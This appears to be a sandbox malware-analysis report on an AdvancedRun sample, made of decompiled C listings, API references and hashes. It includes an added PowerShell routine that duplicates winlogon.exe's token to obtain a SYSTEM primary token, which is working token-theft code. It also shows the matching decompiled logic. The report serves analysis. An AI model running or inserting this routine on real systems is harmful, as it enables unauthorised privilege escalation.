                                                                  				void* __esi;
                                                                  				void* _t18;
                                                                  				intOrPtr* _t22;
                                                                  				void* _t23;
                                                                  				void* _t28;
                                                                  				int _t37;
                                                                  				intOrPtr* _t39;
                                                                  				intOrPtr* _t40;
                                                                  
                                                                  				_v8 = 0;
                                                                  				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                  				_v12 = _t18;
                                                                  				if(_t18 == 0) {
                                                                  					_t37 = GetLastError();
                                                                  				} else {
                                                                  					_t39 = _a4 + 0x800;
                                                                  					_a8 = 0;
                                                                  					E0040289F(_t39);
                                                                  					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                  					if(_t22 == 0) {
                                                                  						_t23 = 0;
                                                                  					} else {
                                                                  						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                  					}
                                                                  					if(_t23 == 0) {
                                                                  						_t37 = GetLastError();
                                                                  					} else {
                                                                  						_a4 = _a8;
                                                                  						E0040289F(_t39);
                                                                  						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                  						if(_t40 == 0) {
                                                                  							_t28 = 0;
                                                                  						} else {
                                                                  							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                  						}
                                                                  						if(_t28 == 0) {
                                                                  							_t37 = GetLastError();
                                                                  						} else {
                                                                  							 *_a12 = _v8;
                                                                  							_t37 = 0;
                                                                  						}
                                                                  						CloseHandle(_a8);
                                                                  					}
                                                                  					CloseHandle(_v12);
                                                                  				}
                                                                  				return _t37;
                                                                  			}

Instruction addresses for the listing above: 0x00401e59 to 0x00401f01

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                  • String ID: winlogon.exe
                                                                  • API String ID: 1315556178-961692650
                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
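
The listing for E00401E44 above resolves OpenProcessToken and DuplicateTokenEx from advapi32.dll at run time (subcall 0040289F) and, judging by the winlogon.exe string reference on the OpenProcess call, is the embedded AdvancedRun utility's route to a SYSTEM primary token. Below is an added PowerShell reconstruction written for this report; it is not code from the sample or from the AdvancedRun project. It decodes the numeric constants in the listing (OpenProcess access 0x2000000 = MAXIMUM_ALLOWED, OpenProcessToken access 2 = TOKEN_DUPLICATE, impersonation level 2 = SecurityImpersonation, token type 1 = TokenPrimary), keeps the same success/Win32-error return convention, and stops where the listing stops: at the duplicated token, which it only inspects. The CreateProcessWithTokenW/CreateProcessWithLogonW exports the subcall also resolves are used outside this function and are deliberately not called. Function and variable names are the editor's; the winlogon.exe target is the listing's.

```powershell
# Added reconstruction of E00401E44 (editor's code, not the sample's). Windows only;
# run from an elevated session. P/Invoke signatures below are the documented ones.
$NativeSource = @'
using System;
using System.Runtime.InteropServices;
public static class TokenDupNative {
    public const uint MAXIMUM_ALLOWED        = 0x02000000; // OpenProcess / DuplicateTokenEx access in the listing
    public const uint TOKEN_DUPLICATE        = 0x00000002; // second argument of the OpenProcessToken call
    public const int  SecurityImpersonation  = 2;          // fourth argument of the DuplicateTokenEx call
    public const int  TokenPrimary           = 1;          // fifth argument of the DuplicateTokenEx call

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes,
                                               int ImpersonationLevel, int TokenType, out IntPtr phNewToken);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
Add-Type -TypeDefinition $NativeSource

function Get-DuplicatedPrimaryToken {
    # Mirrors E00401E44: OpenProcess -> OpenProcessToken -> DuplicateTokenEx, closing the
    # intermediate handles on every path. Returns @{ Token = <IntPtr> } on success or
    # @{ Error = <Win32 code> } where the listing would return GetLastError().
    param([Parameter(Mandatory)][uint32]$ProcessId)

    $hProc = [TokenDupNative]::OpenProcess([TokenDupNative]::MAXIMUM_ALLOWED, $false, $ProcessId)
    if ($hProc -eq [IntPtr]::Zero) {
        return @{ Error = [Runtime.InteropServices.Marshal]::GetLastWin32Error() }
    }
    try {
        $hTok = [IntPtr]::Zero
        if (-not [TokenDupNative]::OpenProcessToken($hProc, [TokenDupNative]::TOKEN_DUPLICATE, [ref]$hTok)) {
            return @{ Error = [Runtime.InteropServices.Marshal]::GetLastWin32Error() }
        }
        try {
            $hDup = [IntPtr]::Zero
            $ok = [TokenDupNative]::DuplicateTokenEx($hTok, [TokenDupNative]::MAXIMUM_ALLOWED, [IntPtr]::Zero,
                      [TokenDupNative]::SecurityImpersonation, [TokenDupNative]::TokenPrimary, [ref]$hDup)
            if (-not $ok) {
                return @{ Error = [Runtime.InteropServices.Marshal]::GetLastWin32Error() }
            }
            return @{ Token = $hDup }
        } finally { [void][TokenDupNative]::CloseHandle($hTok) }   # CloseHandle(_a8) in the listing
    } finally { [void][TokenDupNative]::CloseHandle($hProc) }      # CloseHandle(_v12) in the listing
}

# Usage: target winlogon.exe as the listing's caller does, then only report whose token came back.
$winlogon = Get-Process -Name winlogon | Select-Object -First 1
$result   = Get-DuplicatedPrimaryToken -ProcessId ([uint32]$winlogon.Id)
if ($result.ContainsKey('Error')) {
    "Token duplication failed with Win32 error $($result.Error)"
} else {
    # WindowsIdentity(IntPtr) duplicates the token internally, so ours can be closed afterwards.
    $identity = New-Object System.Security.Principal.WindowsIdentity($result.Token)
    "Duplicated primary token belongs to: $($identity.Name)"
    [void][TokenDupNative]::CloseHandle($result.Token)
}
```

On a default installation winlogon.exe runs as the local SYSTEM account, so the identity reported is the one the sample would hand to CreateProcessWithTokenW. A Win32 error 5 (ERROR_ACCESS_DENIED) from the first step usually means SeDebugPrivilege is not enabled in the calling token; an elevated Windows PowerShell session normally has it enabled, and the "Enables debug privileges" signature in this report is consistent with the sample handling the same requirement itself.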

                                                                  C-Code - Quality: 79%
                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
                                                                  				int _v8;
                                                                  				char _v12;
                                                                  				void _v2058;
                                                                  				void _v2060;
                                                                  				int _t35;
                                                                  				int _t41;
                                                                  				signed int _t48;
                                                                  				signed int _t49;
                                                                  				signed short* _t50;
                                                                  				void** _t52;
                                                                  				void* _t53;
                                                                  				void* _t54;
                                                                  
                                                                  				_t48 = 0;
                                                                  				_v2060 = 0;
                                                                  				memset( &_v2058, 0, 0x7fe);
                                                                  				_t54 = _t53 + 0xc;
                                                                  				 *__ebx = 0;
                                                                  				_t52 = _a4 + 4;
                                                                  				_v12 = 2;
                                                                  				do {
                                                                  					_push( *_t52);
                                                                  					_t6 = _t52 - 4; // 0xe80040cb
                                                                  					_push( *_t6);
                                                                  					_push(L"%s (%s)");
                                                                  					_push(0x400);
                                                                  					_push( &_v2060);
                                                                  					L0040B1EC();
                                                                  					_t35 = wcslen( &_v2060);
                                                                  					_v8 = _t35;
                                                                  					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                  					_t49 = _t48 + _v8 + 1;
                                                                  					_t41 = wcslen( *_t52);
                                                                  					_v8 = _t41;
                                                                  					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                  					_t54 = _t54 + 0x34;
                                                                  					_t52 =  &(_t52[2]);
                                                                  					_t23 =  &_v12;
                                                                  					 *_t23 = _v12 - 1;
                                                                  					_t48 = _t49 + _v8 + 1;
                                                                  				} while ( *_t23 != 0);
                                                                  				_t50 = __ebx + _t48 * 2;
                                                                  				 *_t50 =  *_t50 & 0x00000000;
                                                                  				_t50[1] = _t50[1] & 0x00000000;
                                                                  				return __ebx;
                                                                  			}

Instruction addresses for the listing above: 0x00405241 to 0x004052f2

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                  • String ID: %s (%s)
                                                                  • API String ID: 3979103747-1363028141
                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				void _v514;
                                                                  				short _v516;
                                                                  				void _v8710;
                                                                  				short _v8712;
                                                                  				int _t17;
                                                                  				WCHAR* _t26;
                                                                  
                                                                  				E0040B550(0x2204, __ecx);
                                                                  				_v8712 = 0;
                                                                  				memset( &_v8710, 0, 0x2000);
                                                                  				_t17 = GetDlgCtrlID(_a4);
                                                                  				_t34 = _t17;
                                                                  				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                  				if(_t17 > 0 && _v8712 != 0) {
                                                                  					_v516 = 0;
                                                                  					memset( &_v514, 0, 0x1fe);
                                                                  					GetClassNameW(_a4,  &_v516, 0xff);
                                                                  					_t26 =  &_v516;
                                                                  					_push(L"sysdatetimepick32");
                                                                  					_push(_t26);
                                                                  					L0040B278();
                                                                  					if(_t26 != 0) {
                                                                  						E00406025(_t34,  &_v8712);
                                                                  					}
                                                                  				}
                                                                  				return 1;
                                                                  			}


                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                  • String ID: sysdatetimepick32
                                                                  • API String ID: 1028950076-4169760276
                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E00404706(long __edi, wchar_t* _a4) {
                                                                  				short _v8;
                                                                  				void* _t8;
                                                                  				void* _t10;
                                                                  				long _t14;
                                                                  				long _t24;
                                                                  
                                                                  				_t24 = __edi;
                                                                  				_t8 = 0;
                                                                  				_t14 = 0x1100;
                                                                  				if(__edi - 0x834 <= 0x383) {
                                                                  					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                  					if(0 != 0) {
                                                                  						_t14 = 0x1900;
                                                                  					}
                                                                  				}
                                                                  				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                  					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                  				} else {
                                                                  					if(wcslen(_v8) < 0x400) {
                                                                  						wcscpy(_a4, _v8);
                                                                  					}
                                                                  					_t10 = LocalFree(_v8);
                                                                  				}
                                                                  				return _t10;
                                                                  			}


                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                  • wcslen.MSVCRT ref: 00404756
                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                  • String ID: netmsg.dll
                                                                  • API String ID: 2767993716-3706735626
                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                  				intOrPtr _v12;
                                                                  				void* _v16;
                                                                  				intOrPtr _v20;
                                                                  				char _v32;
                                                                  				char _v72;
                                                                  				void _v582;
                                                                  				long _v584;
                                                                  				void* __edi;
                                                                  				intOrPtr _t27;
                                                                  				wchar_t* _t34;
                                                                  				wchar_t* _t42;
                                                                  				long* _t43;
                                                                  				int _t44;
                                                                  				void* _t52;
                                                                  				void* _t54;
                                                                  				long _t56;
                                                                  				long* _t57;
                                                                  				void* _t60;
                                                                  
                                                                  				_t60 = __eflags;
                                                                  				_t52 = __edx;
                                                                  				E004095AB( &_v72);
                                                                  				_v584 = 0;
                                                                  				memset( &_v582, 0, 0x1fe);
                                                                  				E004095FD(_t52, _t60,  &_v72);
                                                                  				_t27 = 0;
                                                                  				_v12 = 0;
                                                                  				if(_v20 <= 0) {
                                                                  					L10:
                                                                  					_t56 = 0;
                                                                  				} else {
                                                                  					do {
                                                                  						_t57 = E00405A92(_t27,  &_v32);
                                                                  						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                  							goto L9;
                                                                  						} else {
                                                                  							_t34 =  &_v584;
                                                                  							_push(_t34);
                                                                  							_push(_a4);
                                                                  							L0040B278();
                                                                  							if(_t34 == 0) {
                                                                  								L5:
                                                                  								_t44 = 0;
                                                                  								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                  								if(_t54 == 0) {
                                                                  									goto L9;
                                                                  								} else {
                                                                  									_v16 = _v16 & 0;
                                                                  									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                  										_t44 = 1;
                                                                  										CloseHandle(_v16);
                                                                  									}
                                                                  									CloseHandle(_t54);
                                                                  									if(_t44 != 0) {
                                                                  										_t56 =  *_t57;
                                                                  									} else {
                                                                  										goto L9;
                                                                  									}
                                                                  								}
                                                                  							} else {
                                                                  								_t42 = wcschr( &_v584, 0x5c);
                                                                  								if(_t42 == 0) {
                                                                  									goto L9;
                                                                  								} else {
                                                                  									_t43 =  &(_t42[0]);
                                                                  									_push(_t43);
                                                                  									_push(_a4);
                                                                  									L0040B278();
                                                                  									if(_t43 != 0) {
                                                                  										goto L9;
                                                                  									} else {
                                                                  										goto L5;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						goto L12;
                                                                  						L9:
                                                                  						_t27 = _v12 + 1;
                                                                  						_v12 = _t27;
                                                                  					} while (_t27 < _v20);
                                                                  					goto L10;
                                                                  				}
                                                                  				L12:
                                                                  				E004095DA( &_v72);
                                                                  				return _t56;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                  • String ID:
                                                                  • API String ID: 768606695-0
                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v12;
                                                                  				signed int _v16;
                                                                  				signed int _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				void _v68;
                                                                  				char _v108;
                                                                  				void _v160;
                                                                  				void* __esi;
                                                                  				signed int _t55;
                                                                  				void* _t57;
                                                                  				wchar_t* _t67;
                                                                  				intOrPtr* _t73;
                                                                  				signed int _t74;
                                                                  				signed int _t86;
                                                                  				signed int _t95;
                                                                  				intOrPtr* _t98;
                                                                  				void* _t100;
                                                                  				void* _t102;
                                                                  
                                                                  				_t73 = __ebx;
                                                                  				_t74 = 0xd;
                                                                  				_push(9);
                                                                  				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                  				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                  				_t102 = _t100 + 0x18;
                                                                  				asm("movsw");
                                                                  				E00407343(__ebx, _a4, L"<tr>");
                                                                  				_t95 = 0;
                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                  						_v8 = _t55;
                                                                  						_t57 =  &_v160;
                                                                  						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                  							_t57 =  &_v68;
                                                                  						}
                                                                  						_t98 = _a8;
                                                                  						_v28 = _v28 | 0xffffffff;
                                                                  						_v24 = _v24 | 0xffffffff;
                                                                  						_v20 = _v20 | 0xffffffff;
                                                                  						_v16 = _v16 & 0x00000000;
                                                                  						_v12 = _t57;
                                                                  						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                  						E0040ADC0(_v28,  &_v108);
                                                                  						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                  						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                  						_t67 =  *(_t73 + 0x64);
                                                                  						_t86 =  *_t67 & 0x0000ffff;
                                                                  						if(_t86 == 0 || _t86 == 0x20) {
                                                                  							wcscat(_t67, L"&nbsp;");
                                                                  						}
                                                                  						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                  						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                  						_push( &_v108);
                                                                  						_push(_v12);
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                  						L0040B1EC();
                                                                  						_t102 = _t102 + 0x1c;
                                                                  						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                  						_t95 = _t95 + 1;
                                                                  					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t73, _a4, L"\r\n");
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscat
                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                  • API String ID: 384018552-4153097237
                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 42%
                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                  				struct tagMENUITEMINFOW _v0;
                                                                  				int _t24;
                                                                  				wchar_t* _t30;
                                                                  				intOrPtr _t32;
                                                                  				int _t34;
                                                                  				int _t42;
                                                                  				signed int _t47;
                                                                  				signed int _t48;
                                                                  
                                                                  				_t36 = __ecx;
                                                                  				_t48 = _t47 & 0xfffffff8;
                                                                  				E0040B550(0x203c, __ecx);
                                                                  				_t24 = GetMenuItemCount(_a8);
                                                                  				_t34 = _t24;
                                                                  				_t42 = 0;
                                                                  				if(_t34 <= 0) {
                                                                  					L13:
                                                                  					return _t24;
                                                                  				} else {
                                                                  					goto L1;
                                                                  				}
                                                                  				do {
                                                                  					L1:
                                                                  					memset( &_a50, 0, 0x2000);
                                                                  					_t48 = _t48 + 0xc;
                                                                  					_a36 =  &_a48;
                                                                  					_v0.cbSize = 0x30;
                                                                  					_a4 = 0x36;
                                                                  					_a40 = 0x1000;
                                                                  					_a16 = 0;
                                                                  					_a48 = 0;
                                                                  					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                  					if(_t24 == 0) {
                                                                  						goto L12;
                                                                  					}
                                                                  					if(_a48 == 0) {
                                                                  						L10:
                                                                  						_t56 = _a20;
                                                                  						if(_a20 != 0) {
                                                                  							_push(0);
                                                                  							_push(_a20);
                                                                  							_push(_a4);
                                                                  							_t24 = E0040605E(_t36, _t56);
                                                                  							_t48 = _t48 + 0xc;
                                                                  						}
                                                                  						goto L12;
                                                                  					}
                                                                  					_t30 = wcschr( &_a48, 9);
                                                                  					if(_t30 != 0) {
                                                                  						 *_t30 = 0;
                                                                  					}
                                                                  					_t31 = _a16;
                                                                  					if(_a20 != 0) {
                                                                  						if(_a12 == 0) {
                                                                  							 *0x40fe20 =  *0x40fe20 + 1;
                                                                  							_t32 =  *0x40fe20; // 0x0
                                                                  							_t31 = _t32 + 0x11558;
                                                                  							__eflags = _t32 + 0x11558;
                                                                  						} else {
                                                                  							_t17 = _t42 + 0x11171; // 0x11171
                                                                  							_t31 = _t17;
